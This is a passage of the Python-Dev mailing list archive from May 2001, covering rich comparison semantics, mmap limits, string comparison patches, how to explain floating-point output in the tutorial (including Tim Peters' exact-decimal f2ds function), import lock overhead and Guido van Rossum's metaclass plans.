measly element compare away from producing the right cmp() outcome.  This
isn't true of dict compares:  the algorithm for resolving dict Py_EQ/Py_NE
when the dict sizes are the same doesn't do anything to help resolve general
cmp().  Yes, a tp_compare slot could be re-added to lists and tuples, and
implemented via refactoring their current tp_richcompare code into a common
internal routine, but then we've just added another layer of function calls
for all cases.  I've timed C function calls, and it turns out they aren't
actually free <wink>.


From tim.one@home.com  Mon May 21 08:53:24 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 21 May 2001 03:53:24 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: <200105162035.PAA04299@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>

[Guido]
> I would like to break this down by defining the mapping between cmp()
> and rich comparisons.

Good idea!

> I propose:
>
> - If cmp() is requested but not defined, and rich comparisons are
>   defined, try ==, <, > in order; if all three yield false, act as if
>   rich comparisons were not defined, and use the fallback comparison
>   (i.e. by address).

Here and below didn't cover the case where cmp() is requested and is defined.
I believe it's agreed now (but wasn't yet at the time you wrote this) that
cmp() will be called in that case (and which requires changes to the current
implementation).

> - If a rich comparison is requested but not defined, use cmp() and use
>   the obvious mapping.

Cool, except this is missing what I believe was intended detail, like that
when given "x < y" and x.__lt__ is not implemented then y.__gt__ will be
tried before falling back to cmp().  Also note this today:

class C:
    def __lt__(x, y):
        print "in __lt__"
        return NotImplemented

    def __gt__(x, y):
        print "in __gt__"
        return NotImplemented

C() < C()

That prints

in __lt__
in __gt__
in __gt__
in __lt__

I don't know to explain why each method gets called twice (well, I do, but
it's hard to swallow <wink>).  Again this can have semantic consequences,
e.g. if the methods have side-effects; and unclear whether this is intended,
a bug, or implementation-defined.

> - Continue to define the comparison of unequal sequences in terms of
>   cmp().

"the comparison" is ambiguous there:  you mean all comparisons?  just cmp()
comparisons?  just rich comparisons?

In any case, also unclear what "in terms of cmp()" means:  that every pair of
corresponding elements must be compared via cmp()?  Or that only the first
non-Py_EQ pair must be compared via cmp()?  Pseudo-code would be much clearer
than English here.

> - Testing == or != for sequences takes these shortcuts:

Must take these shortcuts, or may take these shortcuts?

>   1. if the lengths differ, the sequences differ

Note that I removed the tuple_richcompare code for doing this, because I
never found a case where tuples were compared via Py_EQ/Py_NE and the lengths
differed.  So the length-check in this case was a waste of time.  It isn't
true of lists or strings that it's a waste of time, but I believe there are
strong reasons for why programs simply will not compare different-sized
tuples for equality.  I would not like to pay for tuple length checks if only
one case in 500 billion would benefit, but if #1 is a mandatory shortcut
there's no choice.

>   2. compare the elements using == until a false return is found

Currently the sequence rich-compare code does #2 for all 6 comparison
operators.  Is that wrong?  Looked reasonable to me!

> Note that this defines 'x!=y' as 'not x==y' for sequences.  We could
> easily go the extra mile and define != to use only != on the items;
> but is this worth the extra complexity?

Not at all:  tuples and lists are Python's sequence types, so Python is
entitled to define what comparison means for them in any way it likes.  We've
already got cases where (see the first msg in this thread)

    [x] cmpop [y]

may yield a different result than

    x cmpop y

so we've already punted on doing the best-possible job of mimicking whatever
crazy-ass comparisons user-defined objects implement, when those objects are
contained in Python sequences.

My bias is showing <wink>:  I want Python's builtin sequence types to be as
efficient as possible.

Nasty example:  two conformable (same rank and dimensions) NumPy matrices A
and B return a conformable matrix of 0/1 bits when compared via "<" (well,
maybe they actually don't, but that's what drove richcmps to begin with!).
It may well be *convenient* for them if

    (A1, A2, A3) < (B1, B2, B3)

always returned a list (or tuple) of 3 0/1 matrices too:

    [A1 < B1, A2 < B2, A3 < B3]

So builtin sequence comparisons can't be all things to all people regardless.


From Barrett@stsci.edu  Mon May 21 13:17:09 2001
From: Barrett@stsci.edu (Paul Barrett)
Date: Mon, 21 May 2001 08:17:09 -0400
Subject: [Python-Dev] mmap module
References: <LNBBLJKPBEHFEDALKOLCAEOKKCAA.tim.one@home.com>
Message-ID: <3B090745.5D70353E@STScI.Edu>

Tim Peters wrote:
> 
> [Paul Barrett]
> > In the CVS log of the mmapmodule.c, Tim Peters says:
> >
> > "The code really needs to be rethought from scratch (not by me, though
> > ...)."
> 
> That was in specific reference to the code I changed, in mmap_find_method.
> The difficulty is that mmap is great for "large files", but the code before
> my change used a C int for the starting offset and also for the return      > value; I boosted those to a C long, which covers 63 bits on 64-bit Linux     > boxes, but doesn't help 64-bit Windows at all (where a C long remains 4      > bytes).  The mmap_object struct uses size_t to declare the relevant members, > which is possibly better still than C long, but may still leave platform     > capabilities out of reach for large files (e.g., "even Win95" *allows*       > specifying 64-bit offsets when creating a mapped file view).  C is a         > friggin' mess here, and Python's PyArg_ParseTuple() and Py_BuildValue()     > don't cater to the full range of C integral types anyway.  In other words,  > if this code is ever to reach its full potential, it "really needs to be     > rethought from scratch".

OK, thanks for the clarification.

> > The ability to have offsets into a file that are not multiples of the
> > system pagesize would also be nice.
> 
> It's OS-specific.  Python should grow warts to protect against it on the     > OSes that care.

Well, hopefully the OS-differences wouldn't prevent implementing a
more abstract interface.

> > I'd be willing to submit a PEP on a new mmapmodule, once I know what
> > others would like.
> 
> Hard to say.  This has the potential to become Python's next thread
> subsystem, i.e. an endless and ultimately hopeless x-platform nightmare.  If
> you do write a PEP, I vote to say that we'll cover Windows and Linux (and
> maybe Mac OS X?) out of the box, but any other platform is at your own risk
> (it doesn't really help if somebody pops up volunteering to support a
> minority platform, because they eventually go away, their code stops         > working, and it never gets fixed -- so it's use-at-your-own-risk in reality
> regardless).

Yes, I agree.  Windows, Unix/Linux, and Mac OS X should be the
supported platforms.

My intention is not to make major changes to the Python interface, but
to fix bugs and to implement some additional features, such as a
non-pagesize file offset.  I'll try to get something written up in the
near future.

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From martin@loewis.home.cs.tu-berlin.de  Mon May 21 17:44:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 18:44:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEGHKDAA.tim.one@home.com>
Message-ID: <200105211644.f4LGixA00818@mira.informatik.hu-berlin.de>

> This stuff all ties together.  A pointer-equality test in string_compare() is
> guaranteed to lose every time string_compare() gets called from
> lookdict_string().  Let's lose string_compare() entirely (in favor of a
> self-contained-- apart from memcmp() --string_richcompare).

Ok. I've now updated my patch on SF to remove string_compare, inline
everything into string_richcompare, add _PyString_Eq, and use that in
lookdict_string. Who would want to review and approve/reject this
patch?

Regards,
Martin


From martin@loewis.home.cs.tu-berlin.de  Mon May 21 18:03:59 2001
From: martin@loewis.home.cs.tu-berlin.de (Martin v. Loewis)
Date: Mon, 21 May 2001 19:03:59 +0200
Subject: [Python-Dev] Comparison speed
In-Reply-To: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCCEFBKDAA.tim.one@home.com>
Message-ID: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>

> Note that the usual way to write this is
> 
>  		if (c < 0 && PyErr_Occurred())
> 
> More work for my artificial "ab" < "cd" case but a net win in real life (when
> c >= 0, it's an internal error if PyErr_Occurred() were to return true; alas,
> when c < 0 there's no way in the cmp protocol to use c's value alone to
> distinguish between "less than" and "error").

Ok. I've updated my tp_compare patch on SF to do so; it also
un-deprecates UserList.__cmp__.

> > Here, I get 3 function calls: f is string_compare, then
> > PyErr_Occurred, finally convert_3way_to_object, which converts
> > {-1,0,1} x Op -> {Py_True, Py_False}.
> 
> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

Any reason why PyThreadState_GET isn't used there?

> There's no danger of over-indexing when ob_size==0, because it doesn't
> include the trailing null byte Python always sticks at the end of string
> objects; and the first-byte check is much more likely to pay off than the
> zero-length check (comparison to a null string?  gotta be rare as clear
> conclusions <wink>), and better to test for the more common case first.

This is now also in the string_richcompare patch on SF.

Regards,
Martin


From tim.one@home.com  Mon May 21 19:29:02 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 21 May 2001 14:29:02 -0400
Subject: [Python-Dev] RE: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: <200105211805.f4LI54T20962@odiug.digicool.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>

[Fred checkin]
> > ***************
> > *** 2610,2617 ****
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200*200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.4, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]
> > --- 2610,2617 ----
> >   \begin{verbatim}
> >   >>> x = 10 * 3.14
> > ! >>> y = 200 * 200
> >   >>> s = 'The value of x is ' + `x` + ', and y is ' + `y` + '...'
> >   >>> print s
> > ! The value of x is 31.400000000000002, and y is 40000...
> >   >>> # Reverse quotes work on other types besides numbers:
> >   ... p = [x, y]

[Guido]
> Hmm...  The tutorial now contains at least one example of floating
> point imprecision.  Does it also contain text to explain this?  (I'm
> sure Tim would be happy to provide some if there isn't any. :-)

[Fred]
> It contains others, and I don't think there's an explanation.  Some
> text from Tim to explain this would be greatly apprectiated!

Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
so long as we rely on the platform C to format floats, the output isn't
well-defined (the last digit or so can and will vary across boxes).

I can certainly explain that this is so, and even why, but unsure the
tutorial is the right place for it.  In any case the tutorial shouldn't be
giving examples whose output is platform-dependent.  For example, don't use
10 * 3.14, use 10 * 3.25.  Want me to scour the tutorial for all such cases?

Or we could put the attached function at the start of the tutorial and use it
to format floats:

>>> f2ds(10 * 3.14)
'31400000000000002131628207280300557613372802734375e-48'
>>>

I'm sure newbies would feel assured by that <wink>.


def f2ds(x):
    """Return float x as exact decimal string.

    The string is of the form:
        "-", if and only if x is < 0.
        One or more decimal digits.  The last digit is not 0 unless x is 0.
        "e"
        The exponent, a (possibly signed) integer
    """

    import math
    # XXX ignoring infinities and NaNs for now.

    if x == 0:
        return "0e0"

    sign = ""
    if x < 0:
        sign = "-"
        x = -x

    f, e = math.frexp(x)
    assert 0.5 <= f < 1.0
    # x = f * 2**e exactly

    # Suck up CHUNK bits at a time; 28 is enough so that we suck
    # up all bits in 2 iterations for all known binary double-
    # precision formats, and small enough to fit in an int.
    CHUNK = 28
    top = 0L
    # invariant: x = (top + f) * 2**e exactly
    while f:
        f = math.ldexp(f, CHUNK)
        digit = int(f)
        assert digit >> CHUNK == 0
        top = (top << CHUNK) | digit
        f -= digit
        assert 0.0 <= f < 1.0
        e -= CHUNK
    assert top > 0

    # Now x = top * 2**e exactly.  Get rid of trailing 0 bits if e < 0
    # (purely to increase efficiency a little later -- this loop can
    # be removed without changing the result).
    while e < 0 and top & 1 == 0:
        top >>= 1
        e += 1

    # Transform this into an equal value top' * 10**e'.
    if e > 0:
        top <<= e
        e = 0
    elif e < 0:
        # Exact is top/2**-e.  Multiply top and bottom by 5**-e to
        # get top*5**-e/10**-e = top*5**-e * 10**e
        top *= 5L**-e

    # Nuke trailing (decimal) zeroes.
    while 1:
        assert top > 0
        newtop, rem = divmod(top, 10L)
        if rem:
            break
        top = newtop
        e += 1

    return "%s%de%d" % (sign, top, e)


From guido@digicool.com  Mon May 21 20:02:43 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 15:02:43 -0400
Subject: [Python-Dev] Re: [Python-checkins] CVS: python/dist/src/Doc/tut tut.tex,1.133.2.1,1.133.2.2
In-Reply-To: Your message of "Mon, 21 May 2001 14:29:02 EDT."
 <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCMEJAKDAA.tim.one@home.com>
Message-ID: <200105211902.f4LJ2iG21543@odiug.digicool.com>

> Actually, 31.400000000000002 wasn't a true improvement over the earlier 31.4:
> so long as we rely on the platform C to format floats, the output isn't
> well-defined (the last digit or so can and will vary across boxes).

I can't check right now, but I thought that this was pretty consistent
across some common platforms?

> I can certainly explain that this is so, and even why, but unsure
> the tutorial is the right place for it.  In any case the tutorial
> shouldn't be giving examples whose output is platform-dependent.
> For example, don't use 10 * 3.14, use 10 * 3.25.  Want me to scour
> the tutorial for all such cases?

Are you serious?

This is something that the newbie wou is in the least bit adventurous
will run into anyway, so I don't think that not talking about this at
all in the tutorial is fair or helpful.  That just perpetuates the
questions from newbies about "floating point is broken" -- since none
of the tutorial examples prepare them for this.

Since this is behavior that is ordinarily observed and perpetually
perplexing, I think it *must* be treated in the tutorial.  The
tutorial doesn't have to have the full explanation -- maybe it's
enough to say something like ``due to round-off errors you will
sometimes see inexact results like 31.400000000000002; don't worry
about this, you can use str() or "%g" (but not round()!) to strip
redundant precision, and here's a URL for more info.''

Or maybe the full story can be an appendix.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@rahul.net  Mon May 21 21:09:04 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:09:04 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105211902.f4LJ2iG21543@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 03:02:43 PM
Message-ID: <20010521200904.05CAE99C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
> Or maybe the full story can be an appendix.

Or maybe Decimal should go in the standard distribution?  What kind of
deadline do I have for finishing that to go into 2.2?
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido@digicool.com  Mon May 21 21:35:10 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:35:10 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:09:04 PDT."
 <20010521200904.05CAE99C81@waltz.rahul.net>
References: <20010521200904.05CAE99C81@waltz.rahul.net>
Message-ID: <200105212035.f4LKZAO31852@odiug.digicool.com>

> > Or maybe the full story can be an appendix.
> 
> Or maybe Decimal should go in the standard distribution?  What kind of
> deadline do I have for finishing that to go into 2.2?

Adding Decimal to the distribution is fine.  But using it by default
for floating point literals and other floating point results is a
different story.  The PEP about that hasn't really been discussed
enough to make a decision, but a conservative estimate is that this
change won't be made in 2.2.  So Decimal doesn't solve the problem the
tutorial has.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From aahz@rahul.net  Mon May 21 21:42:15 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Mon, 21 May 2001 13:42:15 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212035.f4LKZAO31852@odiug.digicool.com> from "Guido van Rossum" at May 21, 2001 04:35:10 PM
Message-ID: <20010521204215.F216699C81@waltz.rahul.net>

Guido van Rossum wrote:
> 
>>> Or maybe the full story can be an appendix.
>> 
>> Or maybe Decimal should go in the standard distribution?  What kind of
>> deadline do I have for finishing that to go into 2.2?
> 
> Adding Decimal to the distribution is fine.  But using it by default
> for floating point literals and other floating point results is a
> different story.  The PEP about that hasn't really been discussed
> enough to make a decision, but a conservative estimate is that this
> change won't be made in 2.2.  So Decimal doesn't solve the problem the
> tutorial has.

Wasn't thinking of going quite that far, only changing the tutorial to
say something like, "If you want speed, use the hardware FP (which is
directly supported by Python's floating literals); if you want accuracy,
use Decimal."  (Or FixedPoint, which is already in the distribution.)
The full story needn't go in the Appendix; we can simply refer people to
Cowlishaw and Kahan.
-- 
                      --- Aahz (@pobox.com)

Hugs and backrubs -- I break Rule 6       <*>       http://www.rahul.net/aahz/
Androgynous poly kinky vanilla queer het Pythonista

I don't really mind a person having the last whine, but I do mind
someone else having the last self-righteous whine.


From guido@digicool.com  Mon May 21 21:57:08 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 16:57:08 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 13:42:15 PDT."
 <20010521204215.F216699C81@waltz.rahul.net>
References: <20010521204215.F216699C81@waltz.rahul.net>
Message-ID: <200105212057.f4LKv8Y32074@odiug.digicool.com>

[Aahz]
> >>> Or maybe the full story can be an appendix.
> >> 
> >> Or maybe Decimal should go in the standard distribution?  What kind of
> >> deadline do I have for finishing that to go into 2.2?

[Guido]
> > Adding Decimal to the distribution is fine.  But using it by default
> > for floating point literals and other floating point results is a
> > different story.  The PEP about that hasn't really been discussed
> > enough to make a decision, but a conservative estimate is that this
> > change won't be made in 2.2.  So Decimal doesn't solve the problem the
> > tutorial has.

[Aahz]
> Wasn't thinking of going quite that far, only changing the tutorial to
> say something like, "If you want speed, use the hardware FP (which is
> directly supported by Python's floating literals); if you want accuracy,
> use Decimal."  (Or FixedPoint, which is already in the distribution.)
> The full story needn't go in the Appendix; we can simply refer people to
> Cowlishaw and Kahan.

I think that most people don't care about either speed or accuracy,
but (being Python users) everybody cares about convenience, and
convenience is using the built-in floating point literals.  (Also,
most other modules returning or using floating point numbers use
binary floating point, e.g. the time module and of course the math
module.)

As long as the built-in literals are binary floating point, they are
what 99% of the code uses, so we need to explain the pitfalls.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From fdrake@cj42289-a.reston1.va.home.com  Mon May 21 22:47:35 2001
From: fdrake@cj42289-a.reston1.va.home.com (Fred Drake)
Date: Mon, 21 May 2001 17:47:35 -0400 (EDT)
Subject: [Python-Dev] [development doc updates]
Message-ID: <20010521214735.BCCD428A10@cj42289-a.reston1.va.home.com>

The development version of the documentation has been updated:

	http://python.sourceforge.net/devel-docs/

Incremental updates to the Python 2.2 documentation.


From tim@digicool.com  Mon May 21 22:57:22 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 21 May 2001 17:57:22 -0400
Subject: [Python-Dev] FP vs. tutorial
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>

Let's get some errors cleared up first:

+ FixedPoint is not in the distribution.

+ There is no PEP for Decimal.

+ Decimal f.p. is not more accurate than binary f.p.  In fact, it's
  provably worse (but not by much).

For the rest,

+ Yes, I'm serious about not including tutorial examples with
  platform-dependent output, unless they're explicitly meant to
  illustrate non-portable code.

+ Specific small examples notwithstanding, there is no uniformity
  across platforms in the last digit or so, because not even the IEEE-
  754 standard requires that (while C is much sloppier than 754), and
  vendors generally don't implement anything better than the minimum
  necessary when it comes to f.p. (Sun is a notable exception).

+ Happy to add text explaining the existence of surprises, and
  providing a URL.  Do the floating-point morons <wink> on Python-Dev
  find this one comprehensible?:

    http://www.lahey.com/float.htm


From guido@digicool.com  Mon May 21 23:33:17 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 18:33:17 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: Your message of "Mon, 21 May 2001 17:57:22 EDT."
 <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
References: <BIEJKCLHCIOIHAGOKOLHIEJECAAA.tim@digicool.com>
Message-ID: <200105212233.f4LMXH000648@odiug.digicool.com>

> + Yes, I'm serious about not including tutorial examples with
>   platform-dependent output, unless they're explicitly meant to
>   illustrate non-portable code.

Sure.  Most examples can be rewritten to avoid platform-dependent
output.  But there should be one section on floating-point
inaccuracies that shows a few of the kind of things you can expect on
a typical platform, and 1.1 -> 1.1000000000000001 is pretty common.

> + Specific small examples notwithstanding, there is no uniformity
>   across platforms in the last digit or so, because not even the IEEE-
>   754 standard requires that (while C is much sloppier than 754), and
>   vendors generally don't implement anything better than the minimum
>   necessary when it comes to f.p. (Sun is a notable exception).

So we'll have to add something like "the actual inexact output you see
may differ from the inexact output in this example".

> + Happy to add text explaining the existence of surprises, and
>   providing a URL.  Do the floating-point morons <wink> on Python-Dev
>   find this one comprehensible?:
> 
>     http://www.lahey.com/float.htm

I was thinking more of immortalizing this one:

http://www.python.org/cgi-bin/moinmoin/RepresentationError

This can serve as a nice self-contained section on f.p. surprises.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From MarkH@ActiveState.com  Tue May 22 00:06:39 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:06:39 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <200105212233.f4LMXH000648@odiug.digicool.com>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>

> > + Happy to add text explaining the existence of surprises, and
> >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> >   find this one comprehensible?:

Hey - I resemble that remark!

> >     http://www.lahey.com/float.htm

I quite liked the tone of this note.  The Python-dev morons probably could
make good sense of this, but only due to the relentless persistence of a
certain timbot.

If not for Tim, I would have forgotten completely about binary floating
point versus decimal floating point.  IIRC, me and about 40 other guys were
desperately trying to get the attention of the single CS female on the day
that lecture was given.  (Actually, that is a pretty safe bet - _all_
lectures were spent that way :)

However, without a little additional background I doubt the masses would be
able to get too far into this.

As Tim has said a few times, most people wont care - they just want it to
work!

> I was thinking more of immortalizing this one:
>
> http://www.python.org/cgi-bin/moinmoin/RepresentationError

IMO, this is a little worse.  There is less "background".  Eg, in almost the
first paragraph we see:

"""
Rewriting
    1        J
   ---  ~= ----
   10      2**N
"""

And I went "huh?  Where did j and N spring from?".  Reading a bit further
made it clear, but this document did seem a little impenetrable to floating
point or maths newbies.

It seems to me that the RepresentationError document was written for people
with a decent background in maths - exactly the sort of people who _don't_
need such a document.

Just-my-0.020000002-cents-worth ly,

Mark.


From jeremy@digicool.com  Tue May 22 00:13:09 2001
From: jeremy@digicool.com (Jeremy Hylton)
Date: Mon, 21 May 2001 19:13:09 -0400 (EDT)
Subject: [Python-Dev] explanations for more pybench slowdowns
In-Reply-To: <200105182107.RAA16214@cliff.concentric.net>
References: <200105182107.RAA16214@cliff.concentric.net>
Message-ID: <15113.41221.839653.822246@slothrop.digicool.com>

We looked at the SecondImport test case today.  It's a good test case
for programs that execute "import os" in a time-critical inner loop
:-).

The primary reason it is slower is the import lock that was added
after 1.5.2.  The benchmark, run in isolation, spends about 6 percent
of its time in the locking code.  Since it only spends about 20
percent of its time actually doing imports, this is a pretty
substantial cost.

It seems possible to eliminate some of the cost by using a special
marker in sys.modules that means: "This is not a module, but it's
being loaded by another thread."  But Guido doesn't sound interested
in optimizing programs with imports in inner loops.

Jeremy


From tim@digicool.com  Tue May 22 00:20:16 2001
From: tim@digicool.com (Tim Peters)
Date: Mon, 21 May 2001 19:20:16 -0400
Subject: [Python-Dev] test_mailbox now fails on Windows
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEJGCAAA.tim@digicool.com>

Appears to be because new code uses os.link, which doesn't exist on Windows.

BTW, test_urllib2.py is still failing on Windows (and has been for a couple
of weeks).


From michel@digicool.com  Tue May 22 00:42:49 2001
From: michel@digicool.com (Michel Pelletier)
Date: Mon, 21 May 2001 16:42:49 -0700 (PDT)
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>

On Tue, 22 May 2001, Mark Hammond wrote:

> > > + Happy to add text explaining the existence of surprises, and
> > >   providing a URL.  Do the floating-point morons <wink> on Python-Dev
> > >   find this one comprehensible?:
> 
> Hey - I resemble that remark!

As they say in the south, "mah-self"

> > >     http://www.lahey.com/float.htm
> 
> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.

I liked the tone too, but it really goes into a lot of detail, there's
this problem, and that one, oh and also *this* one and then there's *that*
and the other thing, and after a while you get the impression that
floating-point is for the insane.

> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys were
> desperately trying to get the attention of the single CS female on the day
> that lecture was given.  (Actually, that is a pretty safe bet - _all_
> lectures were spent that way :)

<sidetrack> 
The funny thing about that is we were in *Long Beach* (I
assume you mean IPC9), if you wanted to see beautiful, scarcely clothed
women in an acceptable public venue you woudn't have had to go far, and
they would have probably had more interesting "significant bits" (it's
none of anyones business where *I* was during the lectures ;).

Someone on the Zope list proposed P4W (Python for Women).  Poor, desperate
souls.  Obviously, P4E includes them too!!
</sidetrack>

> > I was thinking more of immortalizing this one:
> >
> > http://www.python.org/cgi-bin/moinmoin/RepresentationError
> 
> IMO, this is a little worse.

I agree.  Equations should not be needed to explain this.

-Michel


From MarkH@ActiveState.com  Tue May 22 00:47:06 2001
From: MarkH@ActiveState.com (Mark Hammond)
Date: Tue, 22 May 2001 09:47:06 +1000
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <Pine.LNX.4.21.0105211629210.19496-100000@localhost.localdomain>
Message-ID: <LCEPIIGDJPKCOIHOBJEPIEIMDNAA.MarkH@ActiveState.com>

> <sidetrack>
> The funny thing about that is we were in *Long Beach* (I
> assume you mean IPC9), if you wanted to see beautiful, scarcely clothed

Actually, I meant the computer science lectures all those years ago.
Literally one female.

And-not-much-has-changed ly,

Mark.


From guido@digicool.com  Tue May 22 04:22:40 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:22:40 -0400
Subject: [Python-Dev] Classes and Metaclasses in Smalltalk
In-Reply-To: Your message of "Tue, 22 May 2001 10:06:54 +1000."
 <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com>
References: <B43D149A9AB2D411971300B0D03D7E8B90B70A@natasha.auslabs.avaya.com>
Message-ID: <200105220322.XAA13468@cj20424-a.reston1.va.home.com>

Hi Alan,

Thanks a lot for your input.  I am cc'ing this reply to python-dev
because I think my reply will be interesting for others.
(Python-dev'ers: Alan expressed concern that introducing Smalltalk
metaclasses would make Python unnecessarily complicated.)


The way my thinking is currently going, it's not likely that Python
will get a metaclass system similar to Smalltalk.  However, unifying
types and classes is useful for other reasons: please go to
http://python.sourceforge.net/peps/ to read PEP 252 which explains how
introspection can become simpler and more powerful by unifying the
introspection mechanisms for types and classes.

There will still be metaclasses, but the metaclasses will be less
important than in Smalltalk.  Class methods as commonly seen in
Smalltalk are not high on my priority list, and the metaclass
hierarchy won't be parallelling the regular class hierarchy.  Instead,
most metaclass programming will be done in C by programmers who want
to implement alternative class policies.

For example, the current class implementation gives each class a
__dict__ for methods and class variables, and dynamically searches the
class hierarchy for methods.  An alternative inheritance policy could
merge the __dict__ of the base class(es) with the __dict__ of the
derived class at class declaration time: this would make method lookup
a single dict lookup no matter how many levels of base classes are
involved, at the cost of making classes less dynamic, because a change
to a base class won't be seen in a derived class.  A metaclass
controls method lookup and class construction, and thus a different
metaclass can be used to change this policy for selected class
hierarchies without changing the default policy (which would be
backwards incompatible).

Other policies under control of a metaclass could include overriding
hooks for getattr and setattr, alternative mechanisms to store
instance variables (e.g. slot-based rather than dict-based), and so
on.

While I think I can make it possible to write metaclasses in pure
Python (by subclassing types.TypeType), I expect that most
metaprogramming will be done in C, for performance reasons and for
maximum flexibility.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido@digicool.com  Tue May 22 04:55:26 2001
From: guido@digicool.com (Guido van Rossum)
Date: Mon, 21 May 2001 23:55:26 -0400
Subject: [Python-Dev] RE: Rich comparison of lists and tuples
In-Reply-To: Your message of "Mon, 21 May 2001 03:53:24 EDT."
 <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCIEHFKDAA.tim.one@home.com>
Message-ID: <200105220355.XAA13678@cj20424-a.reston1.va.home.com>

> [Guido]
> > I would like to break this down by defining the mapping between cmp()
> > and rich comparisons.

[Tim]
> Good idea!

Followed by many nitpicking questions about what I meant.  As a matter
of process, I think it's better to try to channel instead of challenge
me.  I just don't seem to have the concentration necessary to come up
with all the details needed to make this worthy of a language
definition, and you do.

If you want a BDFL proclamation on currently gray areas in the rules,
or a reversal of what the current implementation does in some cases,
please draft a definition with a few leading questions.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@home.com  Tue May 22 05:02:18 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 22 May 2001 00:02:18 -0400
Subject: [Python-Dev] FP vs. tutorial
In-Reply-To: <LCEPIIGDJPKCOIHOBJEPIEILDNAA.MarkH@ActiveState.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEKGKDAA.tim.one@home.com>

[Mark Hammond, on http://www.lahey.com/float.htm]

> I quite liked the tone of this note.  The Python-dev morons probably could
> make good sense of this, but only due to the relentless persistence of a
> certain timbot.
>
> If not for Tim, I would have forgotten completely about binary floating
> point versus decimal floating point.  IIRC, me and about 40 other guys
> were desperately trying to get the attention of the single CS female on
> the day that lecture was given.  (Actually, that is a pretty safe bet -
> _all_ lectures were spent that way :)

I remember guys like you.  Well guess what?  You ended up with a baby, while
I'm known on two continents as the author of tabnanny.py.  Ha!  Revenge is a
dish best eaten cold <burp>.

> However, without a little additional background I doubt the masses would
> be able to get too far into this.

There's only so much you can say to unmotivated people who are also unwilling
to learn.  That's not my problem.  Finding them a gentle intro from which
they *could* learn isn't either, but typing a URL is easy enough that I don't
mind.

Here:  I want to script MS Word with Python.  I don't know COM and refuse to
learn anything about it.  I'd rather not install win32all either, and import
statements confuse me.  Why don't you make it easy for me?  It's the same
thing -- you can point them at what they need to learn if they're serious,
else they're simply out of luck.

[And on]
>> http://www.python.org/cgi-bin/moinmoin/RepresentationError
>
> IMO, this is a little worse.

